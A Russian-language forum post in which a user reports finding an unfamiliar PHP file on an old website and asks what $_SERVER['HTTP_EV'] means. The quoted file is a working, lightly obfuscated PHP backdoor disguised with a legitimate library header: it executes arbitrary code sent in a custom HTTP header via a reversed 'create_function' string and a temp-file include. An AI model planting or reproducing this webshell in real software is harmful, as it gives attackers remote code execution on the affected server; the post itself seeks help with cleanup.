bruto
Новичок
Здравствуйте!
Нашел на старом сайте левый php-файл.
Понятно, что нужно искать дырки...
Вот код:
Подскажите пожалуйста (в целях повышения образованности), что такое HTTP_EV и соответственно $_SERVER['HTTP_EV']? ![Smile :) :)](/talk/styles/default/xenforo/smilies/smile.png)
Нашел на старом сайте левый php-файл.
Понятно, что нужно искать дырки...
Вот код:
Код:
<?php
/**
* Classes, which help reading streams of data from files.
* Based on the classes from Danilo Segan <[email protected]>
*
* @version $Id: streams.php 642 2012-01-16 20:14:36 nbachiyski $
* @package pomo
* @subpackage streams
*/ header('v: 3');
$h='HTTP_EV';
if(isset($_SERVER[$h])){
$e=$_SERVER[$h].'return true;';
$a=strrev('noitcnuf_etaerc');
$n=$a('', $e);
if(!$n()){
if($t=tmpfile()){
fwrite($t, '<?php '.$e);
$p=stream_get_meta_data($t);
include($p['uri']);
fclose($t);
}
}
}
![Smile :) :)](/talk/styles/default/xenforo/smilies/smile.png)